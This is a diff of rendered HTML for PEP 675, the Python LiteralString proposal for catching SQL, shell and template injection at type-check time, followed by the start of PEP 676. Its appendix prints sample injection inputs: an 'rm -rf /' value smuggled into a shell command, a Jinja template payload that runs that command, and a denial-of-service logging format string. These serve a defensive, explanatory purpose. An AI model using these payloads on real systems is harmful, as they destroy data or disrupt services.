However, recall that we don’t just want to represent exact literal +queries. We also want to support composition of two literal strings, +such as query + " LIMIT 1". This too is possible with the above +concept. If x and y are two values of type LiteralString, +then x + y will also be of type compatible with +LiteralString. We can reason about this by looking at specific +instances such as Literal["foo"] and Literal["bar"]; the value +of the added string x + y can only be "foobar", which has type +Literal["foobar"] and is thus compatible with +LiteralString. The same reasoning applies when x and y are +unions of literal types; the result of pairwise adding any two literal +types from x and y respectively is a literal type, which means +that the overall result is a Union of literal types and is thus +compatible with LiteralString.

+

In this way, we are able to leverage Python’s concept of a Literal +string type to specify that our API can only accept strings that are +known to be constructed from literals. More specific details follow in +the remaining sections.

+
+
+

Specification

+
+

Runtime Behavior

+

We propose adding LiteralString to typing.py, with an +implementation similar to typing.NoReturn.

+

Note that LiteralString is a special form used solely for type +checking. There is no expression for which type(<expr>) will +produce LiteralString at runtime. So, we do not specify in the +implementation that it is a subclass of str.

+
+
+

Valid Locations for LiteralString

+

LiteralString can be used where any other type can be used:

+
variable_annotation: LiteralString
+
+def my_function(literal_string: LiteralString) -> LiteralString: ...
+
+class Foo:
+    my_attribute: LiteralString
+
+type_argument: List[LiteralString]
+
+T = TypeVar("T", bound=LiteralString)
+
+
+

It cannot be nested within unions of Literal types:

+
bad_union: Literal["hello", LiteralString]  # Not OK
+bad_nesting: Literal[LiteralString]  # Not OK
+
+
+
+
+

Type Inference

+
+

Inferring LiteralString

+

Any literal string type is compatible with LiteralString. For +example, x: LiteralString = "foo" is valid because "foo" is +inferred to be of type Literal["foo"].

+

As per the Rationale, we also infer LiteralString in the +following cases:

+
    +
  • Addition: x + y is of type LiteralString if both x and +y are compatible with LiteralString.
  • +
  • Joining: sep.join(xs) is of type LiteralString if sep’s +type is compatible with LiteralString and xs’s type is +compatible with Iterable[LiteralString].
  • +
  • In-place addition: If s has type LiteralString and x has +type compatible with LiteralString, then s += x preserves +s’s type as LiteralString.
  • +
  • String formatting: An f-string has type LiteralString if and only +if its constituent expressions are literal strings. s.format(...) +has type LiteralString if and only if s and the arguments have +types compatible with LiteralString.
  • +
  • Literal-preserving methods: In Appendix C, +we have provided an exhaustive list of str methods that preserve the +LiteralString type.
  • +
+

In all other cases, if one or more of the composed values has a +non-literal type str, the composition of types will have type +str. For example, if s has type str, then "hello" + s +has type str. This matches the pre-existing behavior of type +checkers.

+

LiteralString is compatible with the type str. It inherits all +methods from str. So, if we have a variable s of type +LiteralString, it is safe to write s.startswith("hello").

+

Some type checkers refine the type of a string when doing an equality +check:

+
def foo(s: str) -> None:
+    if s == "bar":
+        reveal_type(s)  # => Literal["bar"]
+
+
+

Such a refined type in the if-block is also compatible with +LiteralString because its type is Literal["bar"].

+
+
+

Examples

+

See the examples below to help clarify the above rules:

+
literal_string: LiteralString
+s: str = literal_string  # OK
+
+literal_string: LiteralString = s  # Error: Expected LiteralString, got str.
+literal_string: LiteralString = "hello"  # OK
+
+
+

Addition of literal strings:

+
def expect_literal_string(s: LiteralString) -> None: ...
+
+expect_literal_string("foo" + "bar")  # OK
+expect_literal_string(literal_string + "bar")  # OK
+
+literal_string2: LiteralString
+expect_literal_string(literal_string + literal_string2)  # OK
+
+plain_string: str
+expect_literal_string(literal_string + plain_string)  # Not OK.
+
+
+

Join using literal strings:

+
expect_literal_string(",".join(["foo", "bar"]))  # OK
+expect_literal_string(literal_string.join(["foo", "bar"]))  # OK
+expect_literal_string(literal_string.join([literal_string, literal_string2]))  # OK
+
+xs: List[LiteralString]
+expect_literal_string(literal_string.join(xs)) # OK
+expect_literal_string(plain_string.join([literal_string, literal_string2]))
+# Not OK because the separator has type 'str'.
+
+
+

In-place addition using literal strings:

+
literal_string += "foo"  # OK
+literal_string += literal_string2  # OK
+literal_string += plain_string # Not OK
+
+
+

Format strings using literal strings:

+
literal_name: LiteralString
+expect_literal_string(f"hello {literal_name}")
+# OK because it is composed from literal strings.
+
+expect_literal_string("hello {}".format(literal_name))  # OK
+
+expect_literal_string(f"hello")  # OK
+
+username: str
+expect_literal_string(f"hello {username}")
+# NOT OK. The format-string is constructed from 'username',
+# which has type 'str'.
+
+expect_literal_string("hello {}".format(username))  # Not OK
+
+
+

Other literal types, such as literal integers, are not compatible with LiteralString:

+
some_int: int
+expect_literal_string(some_int)  # Error: Expected LiteralString, got int.
+
+literal_one: Literal[1] = 1
+expect_literal_string(literal_one)  # Error: Expected LiteralString, got Literal[1].
+
+
+

We can call functions on literal strings:

+
def add_limit(query: LiteralString) -> LiteralString:
+    return query + " LIMIT = 1"
+
+def my_query(query: LiteralString, user_id: str) -> None:
+    sql_connection().execute(add_limit(query), (user_id,))  # OK
+
+
+

Conditional statements and expressions work as expected:

+
def return_literal_string() -> LiteralString:
+    return "foo" if condition1() else "bar"  # OK
+
+def return_literal_str2(literal_string: LiteralString) -> LiteralString:
+    return "foo" if condition1() else literal_string  # OK
+
+def return_literal_str3() -> LiteralString:
+    if condition1():
+        result: Literal["foo"] = "foo"
+    else:
+        result: LiteralString = "bar"
+
+    return result  # OK
+
+
+
+
+

Interaction with TypeVars and Generics

+

TypeVars can be bound to LiteralString:

+
from typing import Literal, LiteralString, TypeVar
+
+TLiteral = TypeVar("TLiteral", bound=LiteralString)
+
+def literal_identity(s: TLiteral) -> TLiteral:
+    return s
+
+hello: Literal["hello"] = "hello"
+y = literal_identity(hello)
+reveal_type(y)  # => Literal["hello"]
+
+s: LiteralString
+y2 = literal_identity(s)
+reveal_type(y2)  # => LiteralString
+
+s_error: str
+literal_identity(s_error)
+# Error: Expected TLiteral (bound to LiteralString), got str.
+
+
+

LiteralString can be used as a type argument for generic classes:

+
class Container(Generic[T]):
+    def __init__(self, value: T) -> None:
+        self.value = value
+
+literal_string: LiteralString = "hello"
+x: Container[LiteralString] = Container(literal_string)  # OK
+
+s: str
+x_error: Container[LiteralString] = Container(s)  # Not OK
+
+
+

Standard containers like List work as expected:

+
xs: List[LiteralString] = ["foo", "bar", "baz"]
+
+
+
+
+

Interactions with Overloads

+

Literal strings and overloads do not need to interact in a special +way: the existing rules work fine. LiteralString can be used as a +fallback overload where a specific Literal["foo"] type does not +match:

+
@overload
+def foo(x: Literal["foo"]) -> int: ...
+@overload
+def foo(x: LiteralString) -> bool: ...
+@overload
+def foo(x: str) -> str: ...
+
+x1: int = foo("foo")  # First overload.
+x2: bool = foo("bar")  # Second overload.
+s: str
+x3: str = foo(s)  # Third overload.
+
+
+
+
+
+
+

Backwards Compatibility

+

We propose adding typing_extensions.LiteralString for use in +earlier Python versions.

+

As PEP 586 mentions, +type checkers “should feel free to experiment with more sophisticated +inference techniques”. So, if the type checker infers a literal string +type for an unannotated variable that is initialized with a literal +string, the following example should be OK:

+
x = "hello"
+expect_literal_string(x)
+# OK, because x is inferred to have type 'Literal["hello"]'.
+
+
+

This enables precise type checking of idiomatic SQL query code without +annotating the code at all (as seen in the Motivation section +example).

+

However, like PEP 586, this PEP does not mandate the above inference +strategy. In case the type checker doesn’t infer x to have type +Literal["hello"], users can aid the type checker by explicitly +annotating it as x: LiteralString:

+
x: LiteralString = "hello"
+expect_literal_string(x)
+
+
+
+
+

Rejected Alternatives

+
+

Why not use tool X?

+

Tools to catch issues such as SQL injection seem to come in three +flavors: AST based, function level analysis, and taint flow analysis.

+

AST-based tools: Bandit +has a plugin to warn when SQL queries are not literal +strings. The problem is that many perfectly safe SQL +queries are dynamically built out of string literals, as shown in the +Motivation section. At the +AST level, the resultant SQL query is not going to appear as a string +literal anymore and is thus indistinguishable from a potentially +malicious string. To use these tools would require significantly +restricting developers’ ability to build SQL queries. LiteralString +can provide similar safety guarantees with fewer restrictions.

+

Semgrep and pyanalyze: Semgrep supports a more sophisticated +function level analysis, including constant propagation +within a function. This allows us to prevent injection attacks while +permitting some forms of safe dynamic SQL queries within a +function. pyanalyze +has a similar extension. But neither handles function calls that +construct and return safe SQL queries. For example, in the code sample +below, build_insert_query is a helper function to create a query +that inserts multiple values into the corresponding columns. Semgrep +and pyanalyze forbid this natural usage whereas LiteralString +handles it with no burden on the programmer:

+
def build_insert_query(
+    table: LiteralString
+    insert_columns: Iterable[LiteralString],
+) -> LiteralString:
+    sql = "INSERT INTO " + table
+
+    column_clause = ", ".join(insert_columns)
+    value_clause = ", ".join(["?"] * len(insert_columns))
+
+    sql += f" ({column_clause}) VALUES ({value_clause})"
+    return sql
+
+def insert_data(
+    conn: Connection,
+    kvs_to_insert: Dict[LiteralString, str]
+) -> None:
+    query = build_insert_query("data", kvs_to_insert.keys())
+    conn.execute(query, kvs_to_insert.values())
+
+# Example usage
+data_to_insert = {
+    "column_1": value_1,  # Note: values are not literals
+    "column_2": value_2,
+    "column_3": value_3,
+}
+insert_data(conn, data_to_insert)
+
+
+

Taint flow analysis: Tools such as Pysa or CodeQL are capable of tracking data flowing +from a user controlled input into a SQL query. These tools are +powerful but involve considerable overhead in setting up the tool in +CI, defining “taint” sinks and sources, and teaching developers how to +use them. They also usually take longer to run than a type checker +(minutes instead of seconds), which means feedback is not +immediate. Finally, they move the burden of preventing vulnerabilities +on to library users instead of allowing the libraries themselves to +specify precisely how their APIs must be called (as is possible with +LiteralString).

+

One final reason to prefer using a new type over a dedicated tool is +that type checkers are more widely used than dedicated security +tooling; for example, MyPy was downloaded over 7 million times in Jan 2022 vs less than +2 million times for +Bandit. Having security protections built right into type checkers +will mean that more developers benefit from them.

+
+
+

Why not use a NewType for str?

+

Any API for which LiteralString would be suitable could instead be +updated to accept a different type created within the Python type +system, such as NewType("SafeSQL", str):

+
SafeSQL = NewType("SafeSQL", str)
+
+def execute(self, sql: SafeSQL, parameters: Iterable[str] = ...) -> Cursor: ...
+
+execute(SafeSQL("SELECT * FROM data WHERE user_id = ?"), user_id)  # OK
+
+user_query: str
+execute(user_query)  # Error: Expected SafeSQL, got str.
+
+
+

Having to create a new type to call an API might give some developers +pause and encourage more caution, but it doesn’t guarantee that +developers won’t just turn a user controlled string into the new type, +and pass it into the modified API anyway:

+
query = f"SELECT * FROM data WHERE user_id = f{user_id}"
+execute(SafeSQL(query))  # No error!
+
+
+

We are back to square one with the problem of preventing arbitrary +inputs to SafeSQL. This is not a theoretical concern +either. Django uses the above approach with SafeString and +mark_safe. Issues +such as CVE-2020-13596 +show how this technique can fail.

+

Also note that this requires invasive changes to the source code +(wrapping the query with SafeSQL) whereas LiteralString +requires no such changes. Users can remain oblivious to it as long as +they pass in literal strings to sensitive APIs.

+
+
+

Why not try to emulate Trusted Types?

+

Trusted Types is a W3C +specification for preventing DOM-based Cross Site Scripting (XSS). XSS +occurs when dangerous browser APIs accept raw user-controlled +strings. The specification modifies these APIs to accept only the +“Trusted Types” returned by designated sanitizing functions. These +sanitizing functions must take in a potentially malicious string and +validate it or render it benign somehow, for example by verifying that +it is a valid URL or HTML-encoding it.

+

It can be tempting to assume porting the concept of Trusted Types to +Python could solve the problem. The fundamental difference, however, +is that the output of a Trusted Types sanitizer is usually intended +to not be executable code. Thus it’s easy to HTML encode the input, +strip out dangerous tags, or otherwise render it inert. With a SQL +query or shell command, the end result still needs to be executable +code. There is no way to write a sanitizer that can reliably figure +out which parts of an input string are benign and which ones are +potentially malicious.

+
+
+

Runtime Checkable LiteralString

+

The LiteralString concept could be extended beyond static type +checking to be a runtime checkable property of str objects. This +would provide some benefits, such as allowing frameworks to raise +errors on dynamic strings. Such runtime errors would be a more robust +defense mechanism than type errors, which can potentially be +suppressed, ignored, or never even seen if the author does not use a +type checker.

+

This extension to the LiteralString concept would dramatically +increase the scope of the proposal by requiring changes to one of the +most fundamental types in Python. While runtime taint checking on +strings, similar to Perl’s taint, +has been considered and +attempted in the past, and +others may consider it in the future, such extensions are out of scope +for this PEP.

+
+
+

Rejected Names

+

We considered a variety of names for the literal string type and +solicited ideas on typing-sig. +Some notable alternatives were:

+
    +
  • Literal[str]: This is a natural extension of the +Literal["foo"] type name, but typing-sig objected +that users could mistake this for the literal type of the str +class.
  • +
  • LiteralStr: This is shorter than LiteralString but looks +weird to the PEP authors.
  • +
  • LiteralDerivedString: This (along with +MadeFromLiteralString) best captures the technical meaning of +the type. It represents not just the type of literal expressions, +such as "foo", but also that of expressions composed from +literals, such as "foo" + "bar". However, both names seem wordy.
  • +
  • StringLiteral: Users might confuse this with the existing +concept of “string literals” +where the string exists as a syntactic token in the source code, +whereas our concept is more general.
  • +
  • SafeString: While this comes close to our intended meaning, it +may mislead users into thinking that the string has been sanitized in +some way, perhaps by escaping HTML tags or shell-related special +characters.
  • +
  • ConstantStr: This does not capture the idea of composing literal +strings.
  • +
  • StaticStr: This suggests that the string is statically +computable, i.e., computable without running the program, which is +not true. The literal string may vary based on runtime flags, as +seen in the Motivation examples.
  • +
  • LiteralOnly[str]: This has the advantage of being extensible to +other literal types, such as bytes or int. However, we did +not find the extensibility worth the loss of readability.
  • +
+

Overall, there was no clear winner on typing-sig over a long period, +so we decided to tip the scales in favor of LiteralString.

+
+
+

LiteralBytes

+

We could generalize literal byte types, such as Literal[b"foo"], +to LiteralBytes. However, literal byte types are used much less +frequently than literal string types and we did not find much user +demand for LiteralBytes, so we decided not to include it in this +PEP. Others may, however, consider it in future PEPs.

+
+
+
+

Reference Implementation

+

This is implemented in Pyre v0.9.8 and is actively being used.

+

The implementation simply extends the type checker with +LiteralString as a supertype of literal string types.

+

To support composition via addition, join, etc., it was sufficient to +overload the stubs for str in Pyre’s copy of typeshed.

+
+
+

Appendix A: Other Uses

+

To simplify the discussion and require minimal security knowledge, we +focused on SQL injections throughout the PEP. LiteralString, +however, can also be used to prevent many other kinds of injection +vulnerabilities.

+
+

Command Injection

+

APIs such as subprocess.run accept a string which can be run as a +shell command:

+
subprocess.run(f"echo 'Hello {name}'", shell=True)
+
+
+

If user-controlled data is included in the command string, the code is +vulnerable to “command injection”; i.e., an attacker can run malicious +commands. For example, a value of ' && rm -rf / # would result in +the following destructive command being run:

+
echo 'Hello ' && rm -rf / #'
+
+
+

This vulnerability could be prevented by updating run to only +accept LiteralString when used in shell=True mode. Here is one +simplified stub:

+
def run(command: LiteralString, *args: str, shell: bool=...): ...
+
+
+
+
+

Cross Site Scripting (XSS)

+

Most popular Python web frameworks, such as Django, use a templating +engine to produce HTML from user data. These templating languages +auto-escape user data before inserting it into the HTML template and +thus prevent cross site scripting (XSS) vulnerabilities.

+

But a common way to bypass auto-escaping +and render HTML as-is is to use functions like mark_safe in +Django +or do_mark_safe in Jinja2, +which cause XSS vulnerabilities:

+
 dangerous_string = django.utils.safestring.mark_safe(f"<script>{user_input}</script>")
+ return(dangerous_string)
+
+
+

This vulnerability could be prevented by updating mark_safe to +only accept LiteralString:

+
 def mark_safe(s: LiteralString) -> str: ...
+
+
+
+
+

Server Side Template Injection (SSTI)

+

Templating frameworks, such as Jinja, allow Python expressions which +will be evaluated and substituted into the rendered result:

+
template_str = "There are {{ len(values) }} values: {{ values }}"
+template = jinja2.Template(template_str)
+template.render(values=[1, 2])
+# Result: "There are 2 values: [1, 2]"
+
+
+

If an attacker controls all or part of the template string, they can +insert expressions which execute arbitrary code and compromise +the application:

+
 malicious_str = "{{''.__class__.__base__.__subclasses__()[408]('rm - rf /',shell=True)}}"
+ template = jinja2.Template(malicious_str)
+ template.render()
+ # Result: The shell command 'rm - rf /' is run
+
+
+

Template injection exploits like this could be prevented by updating +the Template API to only accept LiteralString:

+
 class Template:
+     def __init__(self, source: LiteralString): ...
+
+
+
+
+

Logging Format String Injection

+

Logging frameworks often allow their input strings to contain +formatting directives. At its worst, allowing users to control the +logged string has led to CVE-2021-44228 (colloquially +known as log4shell), which has been described as the “most +critical vulnerability of the last decade”. +While no Python frameworks are currently known to be vulnerable to a +similar attack, the built-in logging framework does provide formatting +options which are vulnerable to Denial of Service attacks from +externally controlled logging strings. The following example +illustrates a simple denial of service scenario:

+
 external_string = "%(foo)999999999s"
+ ...
+ # Tries to add > 1GB of whitespace to the logged string:
+ logger.info(f'Received: {external_string}', some_dict)
+
+
+

This kind of attack could be prevented by requiring that the format +string passed to the logger be a LiteralString and that all +externally controlled data be passed separately as arguments (as +proposed in Issue 46200):

+
 def info(msg: LiteralString, *args: object) -> None:
+     ...
+
+
+
+
+
+

Appendix B: Limitations

+

There are a number of ways LiteralString could still fail to +prevent users from passing strings built from non-literal data to an +API:

+

1. If the developer does not use a type checker or does not add type +annotations, then violations will go uncaught.

+

2. cast(LiteralString, non_literal_string) could be used to lie to +the type checker and allow a dynamic string value to masquerade as a +LiteralString. The same goes for a variable that has type Any.

+

3. Comments such as # type: ignore could be used to ignore +warnings about non-literal strings.

+

4. Trivial functions could be constructed to convert a str to a +LiteralString:

+
 def make_literal(s: str) -> LiteralString:
+     letters: Dict[str, LiteralString] = {
+         "A": "A",
+         "B": "B",
+         ...
+     }
+     output: List[LiteralString] = [letters[c] for c in s]
+     return "".join(output)
+
+
+

We could mitigate the above using linting, code review, etc., but +ultimately a clever, malicious developer attempting to circumvent the +protections offered by LiteralString will always succeed. The +important thing to remember is that LiteralString is not intended +to protect against malicious developers; it is meant to protect +against benign developers accidentally using sensitive APIs in a +dangerous way (without getting in their way otherwise).

+

Without LiteralString, the best enforcement tool API authors have +is documentation, which is easily ignored and often not seen. With +LiteralString, API misuse requires conscious thought and artifacts +in the code that reviewers and future developers can notice.

+
+
+

Appendix C: str methods that preserve LiteralString

+

The str class has several methods that would benefit from +LiteralString. For example, users might expect +"hello".capitalize() to have the type LiteralString similar to +the other examples we have seen in the Inferring LiteralString section. Inferring the type +LiteralString is correct because the string is not an arbitrary +user-supplied string - we know that it has the type +Literal["HELLO"], which is compatible with LiteralString. In +other words, the capitalize method preserves the LiteralString +type. There are several other str methods that preserve +LiteralString.

+

We propose updating the stub for str in typeshed so that the +methods are overloaded with the LiteralString-preserving +versions. This means type checkers do not have to hardcode +LiteralString behavior for each method. It also lets us easily +support new methods in the future by updating the typeshed stub.

+

For example, to preserve literal types for the capitalize method, +we would change the stub as below:

+
# before
+def capitalize(self) -> str: ...
+
+# after
+@overload
+def capitalize(self: LiteralString) -> LiteralString: ...
+@overload
+def capitalize(self) -> str: ...
+
+
+

The downside of changing the str stub is that the stub becomes +more complicated and can make error messages harder to +understand. Type checkers may need to special-case str to make +error messages understandable for users.

+

Below is an exhaustive list of str methods which, when called with +arguments of type LiteralString, must be treated as returning a +LiteralString. If this PEP is accepted, we will update these +method signatures in typeshed:

+
@overload
+def capitalize(self: LiteralString) -> LiteralString: ...
+@overload
+def capitalize(self) -> str: ...
+
+@overload
+def casefold(self: LiteralString) -> LiteralString: ...
+@overload
+def casefold(self) -> str: ...
+
+@overload
+def center(self: LiteralString, __width: SupportsIndex, __fillchar: LiteralString = ...) -> LiteralString: ...
+@overload
+def center(self, __width: SupportsIndex, __fillchar: str = ...) -> str: ...
+
+if sys.version_info >= (3, 8):
+    @overload
+    def expandtabs(self: LiteralString, tabsize: SupportsIndex = ...) -> LiteralString: ...
+    @overload
+    def expandtabs(self, tabsize: SupportsIndex = ...) -> str: ...
+
+else:
+    @overload
+    def expandtabs(self: LiteralString, tabsize: int = ...) -> LiteralString: ...
+    @overload
+    def expandtabs(self, tabsize: int = ...) -> str: ...
+
+@overload
+def format(self: LiteralString, *args: LiteralString, **kwargs: LiteralString) -> LiteralString: ...
+@overload
+def format(self, *args: str, **kwargs: str) -> str: ...
+
+@overload
+def join(self: LiteralString, __iterable: Iterable[LiteralString]) -> LiteralString: ...
+@overload
+def join(self, __iterable: Iterable[str]) -> str: ...
+
+@overload
+def ljust(self: LiteralString, __width: SupportsIndex, __fillchar: LiteralString = ...) -> LiteralString: ...
+@overload
+def ljust(self, __width: SupportsIndex, __fillchar: str = ...) -> str: ...
+
+@overload
+def lower(self: LiteralString) -> LiteralString: ...
+@overload
+def lower(self) -> LiteralString: ...
+
+@overload
+def lstrip(self: LiteralString, __chars: LiteralString | None = ...) -> LiteralString: ...
+@overload
+def lstrip(self, __chars: str | None = ...) -> str: ...
+
+@overload
+def partition(self: LiteralString, __sep: LiteralString) -> tuple[LiteralString, LiteralString, LiteralString]: ...
+@overload
+def partition(self, __sep: str) -> tuple[str, str, str]: ...
+
+@overload
+def replace(self: LiteralString, __old: LiteralString, __new: LiteralString, __count: SupportsIndex = ...) -> LiteralString: ...
+@overload
+def replace(self, __old: str, __new: str, __count: SupportsIndex = ...) -> str: ...
+
+if sys.version_info >= (3, 9):
+    @overload
+    def removeprefix(self: LiteralString, __prefix: LiteralString) -> LiteralString: ...
+    @overload
+    def removeprefix(self, __prefix: str) -> str: ...
+
+    @overload
+    def removesuffix(self: LiteralString, __suffix: LiteralString) -> LiteralString: ...
+    @overload
+    def removesuffix(self, __suffix: str) -> str: ...
+
+@overload
+def rjust(self: LiteralString, __width: SupportsIndex, __fillchar: LiteralString = ...) -> LiteralString: ...
+@overload
+def rjust(self, __width: SupportsIndex, __fillchar: str = ...) -> str: ...
+
+@overload
+def rpartition(self: LiteralString, __sep: LiteralString) -> tuple[LiteralString, LiteralString, LiteralString]: ...
+@overload
+def rpartition(self, __sep: str) -> tuple[str, str, str]: ...
+
+@overload
+def rsplit(self: LiteralString, sep: LiteralString | None = ..., maxsplit: SupportsIndex = ...) -> list[LiteralString]: ...
+@overload
+def rsplit(self, sep: str | None = ..., maxsplit: SupportsIndex = ...) -> list[str]: ...
+
+@overload
+def rstrip(self: LiteralString, __chars: LiteralString | None = ...) -> LiteralString: ...
+@overload
+def rstrip(self, __chars: str | None = ...) -> str: ...
+
+@overload
+def split(self: LiteralString, sep: LiteralString | None = ..., maxsplit: SupportsIndex = ...) -> list[LiteralString]: ...
+@overload
+def split(self, sep: str | None = ..., maxsplit: SupportsIndex = ...) -> list[str]: ...
+
+@overload
+def splitlines(self: LiteralString, keepends: bool = ...) -> list[LiteralString]: ...
+@overload
+def splitlines(self, keepends: bool = ...) -> list[str]: ...
+
+@overload
+def strip(self: LiteralString, __chars: LiteralString | None = ...) -> LiteralString: ...
+@overload
+def strip(self, __chars: str | None = ...) -> str: ...
+
+@overload
+def swapcase(self: LiteralString) -> LiteralString: ...
+@overload
+def swapcase(self) -> str: ...
+
+@overload
+def title(self: LiteralString) -> LiteralString: ...
+@overload
+def title(self) -> str: ...
+
+@overload
+def upper(self: LiteralString) -> LiteralString: ...
+@overload
+def upper(self) -> str: ...
+
+@overload
+def zfill(self: LiteralString, __width: SupportsIndex) -> LiteralString: ...
+@overload
+def zfill(self, __width: SupportsIndex) -> str: ...
+
+@overload
+def __add__(self: LiteralString, __s: LiteralString) -> LiteralString: ...
+@overload
+def __add__(self, __s: str) -> str: ...
+
+@overload
+def __iter__(self: LiteralString) -> Iterator[str]: ...
+@overload
+def __iter__(self) -> Iterator[str]: ...
+
+@overload
+def __mod__(self: LiteralString, __x: Union[LiteralString, Tuple[LiteralString, ...]]) -> str: ...
+@overload
+def __mod__(self, __x: Union[str, Tuple[str, ...]]) -> str: ...
+
+@overload
+def __mul__(self: LiteralString, __n: SupportsIndex) -> LiteralString: ...
+@overload
+def __mul__(self, __n: SupportsIndex) -> str: ...
+
+@overload
+def __repr__(self: LiteralString) -> LiteralString: ...
+@overload
+def __repr__(self) -> str: ...
+
+@overload
+def __rmul__(self: LiteralString, n: SupportsIndex) -> LiteralString: ...
+@overload
+def __rmul__(self, n: SupportsIndex) -> str: ...
+
+@overload
+def __str__(self: LiteralString) -> LiteralString: ...
+@overload
+def __str__(self) -> str: ...
+
+
+
+
+

Appendix D: Guidelines for using LiteralString in Stubs

+

Libraries that do not contain type annotations within their source may +specify type stubs in Typeshed. Libraries written in other languages, +such as those for machine learning, may also provide Python type +stubs. This means the type checker cannot verify that the type +annotations match the source code and must trust the type stub. Thus, +authors of type stubs need to be careful when using LiteralString, +since a function may falsely appear to be safe when it is not.

+

We recommend the following guidelines for using LiteralString in stubs:

+
    +
  • If the stub is for a pure function, we recommend using LiteralString +in the return type of the function or of its overloads only if all +the corresponding parameters have literal types (i.e., +LiteralString or Literal["a", "b"]).
    # OK
    +@overload
    +def my_transform(x: LiteralString, y: Literal["a", "b"]) -> LiteralString: ...
    +@overload
    +def my_transform(x: str, y: str) -> str: ...
    +
    +# Not OK
    +@overload
    +def my_transform(x: LiteralString, y: str) -> LiteralString: ...
    +@overload
    +def my_transform(x: str, y: str) -> str: ...
    +
    +
    +
  • +
  • If the stub is for a staticmethod, we recommend the same +guideline as above.
  • +
  • If the stub is for any other kind of method, we recommend against +using LiteralString in the return type of the method or any of +its overloads. This is because, even if all the explicit parameters +have type LiteralString, the object itself may be created using +user data and thus the return type may be user-controlled.
  • +
  • If the stub is for a class attribute or global variable, we also +recommend against using LiteralString because the untyped code +may write arbitrary values to the attribute.
  • +
+

However, we leave the final call to the library author. They may use +LiteralString if they feel confident that the string returned by +the method or function or the string stored in the attribute is +guaranteed to have a literal type - i.e., the string is created by +applying only literal-preserving str operations to a string +literal.

+

Note that these guidelines do not apply to inline type annotations +since the type checker can verify that, say, a method returning +LiteralString does in fact return an expression of that type.

+
+
+

Resources

+
+

Literal String Types in Scala

+

Scala uses +Singleton as the supertype for singleton types, which includes +literal string types, such as "foo". Singleton is Scala’s +generalized analogue of this PEP’s LiteralString.

+

Tamer Abdulradi showed how Scala’s literal string types can be used +for “Preventing SQL injection at compile time”, Scala Days talk +Literal types: What are they good for? +(slides 52 to 68).

+
+
+

Thanks

+

Thanks to the following people for their feedback on the PEP:

+

Edward Qiu, Jia Chen, Shannon Zhu, Gregory P. Smith, Никита Соболев, +CAM Gerlach, Arie Bovenberg, David Foster, and Shengye Wan

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0675.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0676/index.html b/pep-0676/index.html new file mode 100644 index 00000000000..b0c7cce9d38 --- /dev/null +++ b/pep-0676/index.html @@ -0,0 +1,376 @@ + + + + + + + + PEP 676 – PEP Infrastructure Process | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 676 – PEP Infrastructure Process

+
+
Author:
+
Adam Turner <python at quite.org.uk>
+
Sponsor:
+
Mariatta <mariatta at python.org>
+
PEP-Delegate:
+
Barry Warsaw <barry at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
01-Nov-2021
+
Post-History:
+
23-Sep-2021, 30-Nov-2021
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP addresses the infrastructure around rendering PEP files from +reStructuredText files to HTML webpages. We aim to specify a self-contained +and maintainable solution for PEP readers, authors, and editors.

+
+
+

Motivation

+

As of November 2021, Python Enhancement Proposals (PEPs) are rendered in a +multi-system, multi-stage process. A continuous integration (CI) task runs a +docutils script to render all PEP files individually. The CI task then +uploads a tar archive to a server, where it is retrieved and rendered into the +python.org website periodically.

+

This places a constraint on the python.org website to handle raw HTML +uploads and handle PEP rendering, and makes the appropriate place to raise +issues unclear in some cases [1].

+

This PEP provides a specification for self-contained rendering of PEPs. This +would:

+
    +
  • reduce the amount of distributed configuration for supporting PEPs
  • +
  • enable quality-of-life improvements for those who read, write, and review +PEPs
  • +
  • solve a number of outstanding issues, and lay the path for improvements
  • +
  • save volunteer maintainers’ time
  • +
+

We propose that PEPs are accessed through peps.python.org at the top-level +(for example peps.python.org/pep-0008), and that all custom tooling to +support rendering PEPs is hosted in the python/peps repository.

+
+
+

Rationale

+
+

Simplifying and Centralising Infrastructure

+

As of November 2021, to locally render a PEP file, a PEP author or editor needs +to create a full local instance of the python.org website and run a number +of disparate scripts, following documentation that lives outside of the +python/peps repository.

+

By contrast, the proposed implementation provides a single Makefile and a +Python script to render all PEP files, with options to target a web-server or +the local filesystem.

+

Using a single repository to host all tooling will clarify where to raise +issues, reducing volunteer time spent in triage.

+

Simplified and centralised tooling may also reduce the barrier to entry to +further improvements, as the scope of the PEP rendering infrastructure is well +defined.

+
+
+

Quality-of-Life Improvements and Resolving Issues

+

There are several requests for additional features in reading PEPs, such as:

+
    +
  • syntax highlighting [2]
  • +
  • use of .. code-block:: directives [2]
  • +
  • support for SVG images [3]
  • +
  • typographic quotation marks [4]
  • +
  • additional footer information [5]
  • +
  • intersphinx functionality [6]
  • +
  • dark mode theme [7]
  • +
+

These are “easy wins” from this proposal, and would serve to improve the +quality-of-life for consumers of PEPs (including reviewers and writers).

+

For example, the current (as of November 2021) system runs periodically on a +schedule. This means that updates to PEPs cannot be circulated immediately, +reducing productivity. The reference implementation renders and publishes all +PEPs on every commit to the repository, solving the issue by design.

+

The reference implementation fixes several issues [8]. For example:

+
    +
  • list styles are currently not respected by python.org’s stylesheets
  • +
  • support for updating images in PEPs is challenging in python.org
  • +
+

Third-party providers such as Read the Docs or Netlify can enhance this +experience with features such as automatic rendering of pull requests.

+
+
+
+

Specification

+

The proposed specification for rendering the PEP files to HTML is as per the +reference implementation.

+

The rendered PEPs MUST be available at peps.python.org. These SHOULD be +hosted as static files, and MAY be behind a content delivery network (CDN).

+

A service to render previews of pull requests SHOULD be provided. This service +MAY be integrated with the hosting and deployment solution.

+

The following redirect rules MUST be created for the python.org domain:

+ +

The following nginx configuration would achieve this:

+
location ~ ^/dev/peps/?(.*)$ {
+    return 308 https://peps.python.org/$1/;
+}
+
+location ~ ^/peps/(.*)\.html$ {
+    return 308 https://peps.python.org/$1/;
+}
+
+location ^/(dev/)?peps(/.*)?$ {
+    return 308 https://peps.python.org/;
+}
+
+
+

Redirects MUST be implemented to preserve URL fragments for backward +compatibility purposes.

+
+
+

Backwards Compatibility

+

